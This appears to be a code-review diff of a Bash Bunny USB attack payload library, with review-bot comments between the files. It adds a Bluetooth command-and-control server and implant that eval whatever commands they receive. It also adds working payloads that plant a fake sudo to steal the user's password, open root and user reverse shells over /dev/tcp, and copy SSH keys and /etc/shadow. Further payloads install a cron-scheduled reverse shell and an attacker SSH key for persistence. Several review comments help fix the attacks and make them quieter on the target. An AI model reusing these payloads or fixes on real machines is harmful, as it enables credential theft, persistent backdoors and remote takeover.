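Review bot: none of the forms in this panel carries an anti-CSRF token or any origin check, yet each one POSTs a hidden `mode=cmd` plus a free-form `query` that the Bunny executes, and the Power Management options are raw shell (`<option value="shutdown -h now" selected>Shutdown</option>`, `<option value="reboot">Reboot</option>`); with the C2 served on localhost, any web page open in the operator's browser could drive the Bunny with a cross-site POST, so add a per-session token to every form and verify Origin/Host server-side. Smaller points: four modal panels reuse `id="action"` (ids must be unique; the `info(...)`/`infoClose(...)` handlers only use the outer `info_*` ids, so drop the inner one), `<p>` is not allowed inside `<h4>` and browsers will close the heading early, and the copy has typos: "Light up your Bush Bunny" (Bash), "will be saved temporary" (temporarily), "encouter" (encounter), and "may help when you encouter execution issues. When the attacked device won't recognize..." should be two clear sentences.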
@ -0,0 +1,92 @@
|
|||
![BlueBunny-Banner](https://github.com/90N45-d3v/BlueBunny/assets/79598596/fae0b5ca-6b38-41b3-a5fc-7aa3cabea369)
|
||||
<p align="center">
|
||||
<img src="https://img.shields.io/badge/Made%20with-Python-blue">
|
||||
<img src="https://img.shields.io/github/license/90N45-d3v/BlueBunny.svg">
|
||||
<img src="https://img.shields.io/badge/Ask%20me-anything-1abc9c.svg">
|
||||
<br>
|
||||
<img src="https://img.shields.io/badge/-Linux-lightblue">
|
||||
</p>
|
||||
<p align="center">
|
||||
C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.<br>Send your Bash Bunny all the instructions it needs just over the air.
|
||||
</p>
|
||||
|
||||
* Author: 90N45
|
||||
* Version: 1.0
|
||||
* Category: Remote
|
||||
* Attackmodes: NONE (Custom)
|
||||
|
||||
## Table of contents
|
||||
- [Overview](https://github.com/90N45-d3v/BlueBunny#overview)
|
||||
- [Installation & Start](https://github.com/90N45-d3v/BlueBunny#installation--start)
|
||||
- [Manual communication with the Bash Bunny through Python](https://github.com/90N45-d3v/BlueBunny#manual-communication-with-the-bash-bunny-through-python)
|
||||
- [Troubleshooting](https://github.com/90N45-d3v/BlueBunny#troubleshooting)
|
||||
- [Working on...](https://github.com/90N45-d3v/BlueBunny#working-on)
|
||||
- [Additional information](https://github.com/90N45-d3v/BlueBunny#additional-information)
|
||||
|
||||
## Overview
|
||||
#### Structure
|
||||
![BlueBunny-Structure](https://github.com/90N45-d3v/BlueBunny/assets/79598596/3004fb10-feef-45c8-8624-1393c2fb7288)
|
||||
|
||||
|
||||
## Installation & Start
|
||||
1. Install required dependencies
|
||||
````
|
||||
pip install pygatt "pygatt[GATTTOOL]"
|
||||
````
|
||||
Make sure [BlueZ](http://www.bluez.org/download/) is installed and `gatttool` is usable
|
||||
````
|
||||
sudo apt install bluez
|
||||
````
|
||||
2. Download the `BlueBunny` folder and switch into the `BlueBunny/C2` folder
|
||||
````
|
||||
cd BlueBunny/C2
|
||||
````
|
||||
3. Start the C2 server
|
||||
````
|
||||
sudo python c2-server.py
|
||||
````
|
||||
4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: `BlueBunny/payload.txt`).
|
||||
5. Visit your C2 server from your browser on `localhost:1472` and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).
|
||||
|
||||
|
||||
## Manual communication with the Bash Bunny through Python
|
||||
You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.
|
||||
#### Example Code
|
||||
````python
|
||||
# Import the backend (BlueBunny/C2/BunnyLE.py)
|
||||
import BunnyLE
|
||||
|
||||
# Define the data to send
|
||||
data = "QUACK STRING I love my Bash Bunny"
|
||||
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
|
||||
d_type = "cmd"
|
||||
|
||||
# Initialize BunnyLE
|
||||
BunnyLE.init()
|
||||
|
||||
# Connect to your Bash Bunny
|
||||
bb = BunnyLE.connect()
|
||||
|
||||
# Send the data and let it execute
|
||||
BunnyLE.send(bb, data, d_type)
|
||||
````
|
||||
|
||||
## Troubleshooting
|
||||
#### Connecting your Bash Bunny doesn't work? Try the following instructions:
|
||||
- Try connecting a few more times
|
||||
- Check if your bluetooth adapter is available
|
||||
- Restart the system your C2 server is running on
|
||||
- Check if your Bash Bunny is running the BlueBunny payload properly
|
||||
- How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?
|
||||
#### Bugs within BlueZ
|
||||
The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.
|
||||
- Timeout after 5.0 seconds
|
||||
- Unknown error while scanning for BLE devices
|
||||
|
||||
## Working on...
|
||||
- Remote shell access
|
||||
- BLE exfiltration channel
|
||||
- Improved connecting process
|
||||
|
||||
## Additional information
|
||||
As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.
|
|
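Review bot: nothing in install steps 1 to 5 sets a pairing key, passphrase or any other authentication for the BLE link, and step 5 only says the Bunny "will light up green when it's ready to pair"; the README should state plainly that any BLE peer in range that connects to the advertised device can submit commands, and recommend use only in a controlled environment. Two smaller points: step 3 runs the C2 as root (`sudo python c2-server.py`) without saying why (gatttool needs raw HCI access), and `sudo apt install bluez` may not provide `gatttool` on current Debian/Ubuntu releases because upstream BlueZ marks it deprecated and distributions have dropped it from the package, so document the BlueZ version this was tested with. Typo in the example comment: "temporary written" (temporarily).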
@ -0,0 +1,63 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: BlueBunny
|
||||
# Description: BLE based C2 server for the Bash Bunny Mark II
|
||||
# Author: 90N45
|
||||
# Version: 1.0
|
||||
# Category: Remote
|
||||
# Attackmodes: NONE (Custom)
|
||||
|
||||
LED SETUP
|
||||
|
||||
# Enable serial BLE module
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
|
||||
# Configure BLE module as slave
|
||||
echo -n -e "AT+ROLE=0" > /dev/ttyS1
|
||||
echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
|
||||
echo -n -e "AT+ADV=1" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
|
||||
LED FINISH
|
||||
|
||||
while [[ true ]]; do
|
||||
# Get incomming data from serial port
|
||||
data=$(head -1 /dev/ttyS1)
|
||||
|
||||
# Decode base64 encoded data
|
||||
data=$(echo ${data} | base64 -d)
|
||||
|
||||
# Echo data for debugging
|
||||
echo "Debugger: ${data}"
|
||||
|
||||
# Single command
|
||||
if [[ $data =~ "<CMD>" ]]; then
|
||||
# Extract command
|
||||
command=${data#*<CMD>}
|
||||
command=${command%%<CMD>*}
|
||||
|
||||
# Run recieved command
|
||||
eval "${command}"
|
||||
fi
|
||||
|
||||
# Payload file
|
||||
if [[ $data =~ "<PAYLOAD>" ]]; then
|
||||
# Set payload file name
|
||||
file="BlueBunnyPayload-${RANDOM}.txt"
|
||||
|
||||
# Extract file content
|
||||
content=${data#*<PAYLOAD>}
|
||||
content=${content%%<PAYLOAD>*}
|
||||
|
||||
# Write content to file
|
||||
printf "${content}" > "${file}";
|
||||
|
||||
# Run payload
|
||||
bash $file
|
||||
|
||||
# Remove payload file
|
||||
rm $file
|
||||
fi
|
||||
done
|
|
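Review bot: `eval "${command}"` and the `bash $file` branch run whatever arrives on `/dev/ttyS1` after base64 decoding, and the module setup above (`AT+ROLE=0`, `AT+NAME=BlueBunny`, `AT+ADV=1`) advertises openly with no passkey or pairing step, so any BLE client in range that writes to the serial characteristic gets root on the Bunny; at minimum check a shared secret prefix before the `eval` and say so in the header. Other points: the `stty -F /dev/ttyS1 ...` line is duplicated; `printf "${content}" > "${file}"` uses the payload as a format string, so any `%` in a payload is mangled (use `printf '%s' "${content}"`); `echo ${data} | base64 -d`, `bash $file` and `rm $file` are unquoted and should be quoted; and `echo "Debugger: ${data}"` prints every received command to stdout, which belongs behind a debug flag in a shipped payload. Typos in comments: "incomming", "recieved".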
@ -15,7 +15,7 @@
|
|||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
#
|
||||
# Modified by 0iphor13 for PingZhellBunny
|
||||
# Modified by 0i41E for PingZhellBunny
|
||||
#
|
||||
#
|
||||
#
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: PingZhellBunny**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.5<br>
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: PingZhellBunny
|
||||
# Description: Getting remote access via ICMP
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.5
|
||||
# Category: Remote_Access
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: ReverseBunny**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.5<br>
|
||||
|
||||
|
@ -8,7 +8,7 @@ Version: 1.5<br>
|
|||
<p>!Getting remote access via obfuscated reverse shell!<br>
|
||||
Upload payload.txt and RevBunny.ps1 onto your Bunny
|
||||
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
|
||||
|
||||
Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>
|
||||
|
||||
|
|
|
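Review bot: the image link now points at a personal fork (`https://github.com/0i41E/bashbunny-payloads/.../RevBunny.png`), so it breaks the next time that fork is renamed or removed, which is exactly the breakage this rename is repairing; reference the image relatively (`![alt text](RevBunny.png)`) so the README renders from whichever repository it lives in.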
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: ReverseBunny
|
||||
# Description: Get remote access, using an obfuscated powershell reverse shell.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.5
|
||||
# Category: Remote_Access
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: ReverseBunnySSL**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.2<br>
|
||||
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
|
||||
|
@ -26,5 +26,5 @@ I recommend openssl itself or ncat - Example syntax for both:<br>
|
|||
|
||||
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
|
||||
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)
|
||||
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)
|
||||
|
|
|
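Review bot: both image links point at personal forks rather than this repository, and `CreateCert.png` even comes from a different project (`https://github.com/0i41E/omg-payloads/.../ReverseCableSSL/CreateCert.png`), so this README depends on an unrelated repo keeping that file at that path; copy both images into the `ReverseBunnySSL/` folder and reference them relatively so the next handle change does not break them again.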
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: ReverseBunnySSL
|
||||
# Description: Get remote access, using an obfuscated powershell reverse shell.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.2
|
||||
# Category: Remote_Access
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
|
|
@ -0,0 +1,15 @@
|
|||
# Root_Reverse_Shell_linux_mac
|
||||
|
||||
### Since i dont have a bash bunny this is tested in digispark
|
||||
### I have converted this script to bash bunny
|
||||
### If any issues put in discussion i will fix it
|
||||
POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
|
||||
### Special thanks to sudobackdoor for bash script sample
|
||||
Dont forget to change IP in payload.sh.<br/>
|
||||
Before using this payload don't forget to start netcat listeners on port 4444 and 1337.<br/>
|
||||
It reverse connects user shell in port 4444 and root shell in port 1337.<br/>
|
||||
Make sure switch is in position 1.<br/>
|
||||
|
||||
Once the payload.sh is executed the sudobackdoor script it will gets the root credential and It will be used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
|
||||
|
||||
The reason for two netcat connection is user level connection established when script is executed. But to obtain root credential is required, So it waits for user to elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established.
|
|
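Review bot: the README admits the payload was never run on a Bash Bunny ("Since i dont have a bash bunny this is tested in digispark"), so mark it untested in the payload header as well, and it never says what the payload leaves on the target: `payload.sh` appends a PATH entry to the victim's `~/.bashrc` or `~/.bash_profile` and installs a fake `sudo` under `~/.config/sudo`, and the cleanup only runs if the victim later types a correct sudo password. Add a manual-cleanup section (restore `~/.bashrc.bak` / `~/.bash_profile.bak`, delete `~/.config/sudo`) for engagements where that never happens. Also "Make sure switch is in position 1" contradicts the payload, which reads `GET SWITCH_POSITION`, and the POC is a Google Drive share link that reviewers cannot inspect; put a screenshot in the payload folder instead.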
@ -0,0 +1,59 @@
|
|||
#!/bin/bash
|
||||
|
||||
LISTENER_IP="127.0.0.1"
|
||||
LISTENER1_PORT="1337" #Listener for root shell
|
||||
LISTENER2_PORT="4444" #Listener for user shell
|
||||
|
||||
if [ ! -d ~/.config/sudo ]
|
||||
then
|
||||
mkdir -p ~/.config/sudo
|
||||
fi
|
||||
|
||||
if [ -f ~/.config/sudo/sudo ]
|
||||
then
|
||||
rm ~/.config/sudo/sudo
|
||||
fi
|
||||
|
||||
|
||||
echo '#!'$SHELL >> ~/.config/sudo/sudo
|
||||
cat <<'EOF' >> ~/.config/sudo/sudo
|
||||
/usr/bin/sudo -n true 2>/dev/null
|
||||
if [ $? -eq 0 ]
|
||||
then
|
||||
/usr/bin/sudo $@
|
||||
else
|
||||
echo -n "[sudo] password for $USER: "
|
||||
read -s pwd
|
||||
echo
|
||||
echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
|
||||
if [ $? -eq 1 ]
|
||||
then
|
||||
echo "Sorry, try again."
|
||||
sudo $@
|
||||
else
|
||||
/usr/bin/sudo -S $@
|
||||
if [ -f ~/.bash_profile ]
|
||||
then
|
||||
rm ~/.bash_profile
|
||||
mv ~/.bash_profile.bak ~/.bash_profile
|
||||
else
|
||||
rm ~/.bashrc
|
||||
mv ~/.bashrc.bak ~/.bashrc
|
||||
fi
|
||||
rm ~/.config/sudo/sudo
|
||||
echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER1_PORT 0<&1 2>&1) &
|
||||
fi
|
||||
fi
|
||||
EOF
|
||||
|
||||
chmod u+x ~/.config/sudo/sudo
|
||||
if [ -f ~/.bash_profile ]
|
||||
then
|
||||
cp ~/.bash_profile ~/.bash_profile.bak
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
|
||||
else
|
||||
cp ~/.bashrc ~/.bashrc.bak
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
|
||||
fi
|
||||
disown !$ $(/bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER2_PORT 0<&1 2>&1) &
|
||||
bash
|
|
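Review bot: the root callback can never connect: the wrapper is written with a quoted heredoc (`cat <<'EOF' >> ~/.config/sudo/sudo`), so `$LISTENER_IP` and `$LISTENER1_PORT` on the `/dev/tcp/$LISTENER_IP/$LISTENER1_PORT` line are copied literally into the wrapper, and they are unset (never exported) when the victim's shell later runs it. Either substitute the values when writing the file (unquoted heredoc with the other `$` signs escaped) or `export` them before the heredoc. Further points: `echo "$pwd" | sudo -S disown ...` hands a shell builtin to `sudo`, which cannot execute it, and `disown !$ $(...) &` relies on history expansion that is off in scripts, so just background the reverse shell with `&` in both places (`/bin/bash -i > /dev/tcp/... 0<&1 2>&1 &`); `~/.bashrc` and `~/.bash_profile` are not read by the default zsh login shell on current macOS, so the Mac half of "Linux/Mac" will not trigger; and the trailing `bash` leaves an interactive shell in the terminal that the HID payload then tries to close with `exit`.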
@ -0,0 +1,50 @@
|
|||
# Title: Linux/Mac Reverse Shell
|
||||
# Author: Darkprince (Sridhar)
|
||||
# Version: 1.0
|
||||
#
|
||||
# Runs a script in the background that provides a user shell initially and waits for the user to escalate privileges, then provides a root reverse shell.
|
||||
|
||||
# Magenta..................Setup
|
||||
# Red, Green, Blue.........Executing
|
||||
# Green....................Finished
|
||||
|
||||
# INITIALIZING
|
||||
LED W
|
||||
|
||||
# Mac keyboard works in Linux and Mac
|
||||
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
||||
|
||||
LANGUAGE='us'
|
||||
|
||||
# Ensure the switch position is 1
|
||||
# Delay for HID device recognition
|
||||
Q DELAY 1000
|
||||
|
||||
# ATTACKING
|
||||
LED R G B
|
||||
|
||||
# Get Linux/Mac Terminal
|
||||
RUN UNITY xterm
|
||||
Q DELAY 1000
|
||||
# To close the opened window by the Linux run command
|
||||
Q GUI Q
|
||||
Q CTRL C
|
||||
RUN OSX terminal
|
||||
Q DELAY 1000
|
||||
|
||||
# If Linux, then clearing 'terminal' which is typed by Mac run script
|
||||
Q CTRL C
|
||||
|
||||
# Execute bash script which is the same for Mac and Linux
|
||||
GET SWITCH_POSITION
|
||||
Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh
|
||||
|
||||
# The cleanup process will be handled by the bash script
|
||||
# Closing the xterm in Linux
|
||||
# Closing the terminal in Mac, even if the terminal has other processes COMMAND Q and ENTER keys will terminate the terminal
|
||||
Q GUI Q
|
||||
Q CTRL C
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
|
||||
LED G
|
|
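Review bot: `Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh` is never followed by `Q ENTER`, so the script is typed but not run before `Q GUI Q` / `Q CTRL C` close the terminal; add `Q ENTER` and a delay after it. The path is also macOS-only: `/Volumes/BashBunny` does not exist on Linux, where the automount is `/media/$USER/BashBunny` (as the SSHhhhhh payload in this same merge uses), so despite the "Mac keyboard works in Linux and Mac" comment the Linux case cannot work; select the path per OS or try both. Smaller points: the legend says "Magenta..................Setup" but the setup step runs `LED W`; `# Ensure the switch position is 1` contradicts the `GET SWITCH_POSITION` used below; and the header lacks the `Category:` and `Attackmodes:` lines the other payloads in the library carry.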
@ -0,0 +1,48 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Main Payload
|
||||
|
||||
# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc..
|
||||
RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named
|
||||
REVERSESHELL=true
|
||||
LHOST='10.20.20.104' # Reverse Shell listening host IP
|
||||
LPORT='4444' # Reverse Shell listening host port
|
||||
CRON='30 */1 * * *' # Just the timing portion of the CRON job
|
||||
ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces
|
||||
DT=$(date "+%Y.%m.%d-%H.%M.%S")
|
||||
DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT
|
||||
|
||||
if [ "$REVERSESHELL" = true ] ; then
|
||||
# Create reverse shell script
|
||||
echo "#!/bin/bash"> .config/rs.sh ;
|
||||
echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ;
|
||||
chmod +x /home/$USER/.config/rs.sh ;
|
||||
|
||||
# Add task to CRON that launches the Reverse_TCP script on a schedule for persistence
|
||||
crontab -l > crontab.tmp ;
|
||||
if grep -Fq .config/rs.sh crontab.tmp; then
|
||||
echo 'Update in progress.'
|
||||
else
|
||||
echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ;
|
||||
crontab crontab.tmp ;
|
||||
fi
|
||||
rm -f crontab.tmp ;
|
||||
fi
|
||||
|
||||
# Smash & Grab the loot!! (Get what you can now and work on PrivEsc later)
|
||||
mkdir $DN ;
|
||||
ip addr > $DN/ip-addr.txt ;
|
||||
whoami > $DN/whoami.txt ;
|
||||
cat /proc/net/arp > $DN/arp.txt ;
|
||||
cat /etc/passwd > $DN/etc-passwd.txt ;
|
||||
cat /etc/shadow > $DN/etc-shadow.txt ;
|
||||
uname -a > $DN/uname-a.txt ;
|
||||
route -n > $DN/route-n.txt ;
|
||||
cp /home/$USER/.ssh/* $DN/. ;
|
||||
|
||||
# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence
|
||||
if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then
|
||||
echo 'Update almost completed.'
|
||||
else
|
||||
echo $RSA_KEY >> .ssh/authorized_keys ;
|
||||
fi
|
|
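Review bot: the persistence steps assume paths that may not exist: `echo "#!/bin/bash"> .config/rs.sh` and `echo $RSA_KEY >> .ssh/authorized_keys` are relative to the current directory (only correct because payload.txt launches this from the home directory), and nothing creates `~/.ssh` or `authorized_keys` first, so on a user who has never used SSH the key drop fails silently; use `mkdir -p "$HOME/.ssh" && chmod 700 "$HOME/.ssh"`, `chmod 600 "$HOME/.ssh/authorized_keys"`, and absolute `$HOME` paths throughout (the `chmod +x /home/$USER/.config/rs.sh` line already does). The header comment says "METERPRETER Reverse_TCP" but `rs.sh` is a bash `/dev/tcp` shell, so fix the comment; `cp /home/$USER/.ssh/* $DN/.`, `cat /etc/shadow` and `crontab -l` all print errors to the target's screen when the files are missing or unreadable, so redirect their stderr to keep the terminal quiet; and quote `$DN` wherever it is used.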
@ -0,0 +1,54 @@
|
|||
# Title: SSHhhhhh
|
||||
# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
|
||||
# Author: WWVB
|
||||
# Props: Hak5Darren, hak5peaks
|
||||
# Version: 1.1
|
||||
# Category: Exfiltration w/Persistence
|
||||
# Target: Linux Ubuntu 18.04 LTS
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
DRIVE_LABEL="BashBunny"
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
|
||||
LED STAGE1
|
||||
QUACK DELAY 500
|
||||
QUACK CTRL-ALT t
|
||||
QUACK DELAY 100
|
||||
|
||||
# Drop primary payload on the box
|
||||
QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh .
|
||||
QUACK ENTER
|
||||
QUACK DELAY 50
|
||||
|
||||
QUACK STRING chmod +x boom.sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 50
|
||||
|
||||
LED ATTACK
|
||||
|
||||
# Light the fuse and wait!!
|
||||
QUACK STRING ./boom.sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
|
||||
# Cleanup
|
||||
LED CLEANUP
|
||||
QUACK STRING rm boom.sh
|
||||
QUACK ENTER
|
||||
QUACK DELAY 100
|
||||
|
||||
# Bye Felicia!
|
||||
QUACK STRING umount '/media/$USER/$DRIVE_LABEL'
|
||||
QUACK ENTER
|
||||
QUACK DELAY 25
|
||||
|
||||
QUACK STRING exit
|
||||
QUACK ENTER
|
||||
QUACK DELAY 25
|
||||
|
||||
LED FINISH
|
|
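Review bot: the unmount step will not work: `QUACK STRING umount '/media/$USER/$DRIVE_LABEL'` single-quotes both variables on the Bunny side, so `$DRIVE_LABEL` reaches the target unexpanded and the target has no such variable, whereas the copy line above correctly uses `/media/\$USER/$DRIVE_LABEL`; make the two consistent. The `#!/bin/bash` placed after the header and `DRIVE_LABEL="BashBunny"` is only a comment there; move it to the first line or drop it. Also `# Version: 1.1` here disagrees with `Version 1.0` in the README; align them.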
@ -0,0 +1,32 @@
|
|||
# SSHhhhhh
|
||||
|
||||
## Author: WWVB
|
||||
## Version: Version 1.0
|
||||
|
||||
## Description
|
||||
|
||||
## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS)
|
||||
Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [nothing major])
|
||||
|
||||
## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..)
|
||||
whoami
|
||||
|
||||
ip addr
|
||||
|
||||
arp data
|
||||
|
||||
route -n
|
||||
|
||||
/etc/passwd
|
||||
|
||||
/etc/shadow (on the off chance you get a root terminal)
|
||||
|
||||
uname -a
|
||||
|
||||
## Two opportunites for persistence are injected:
|
||||
|
||||
Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You)
|
||||
|
||||
Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later)
|
||||
|
||||
## Configuration = HID STORAGE
|
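Review bot: `~/$USER/.ssh` (used three times) is not a real path, since `~` already expands to the user's home; write `~/.ssh`, `~/.ssh/authorized_keys` and `~/.config`. `## Version: Version 1.0` disagrees with `# Version: 1.1` in payload.txt, the `## Description` heading has no body, and since `rs.sh`, the crontab entry and the authorized_keys line are left behind by design, the README should list them so the operator knows what to remove from the target after the engagement.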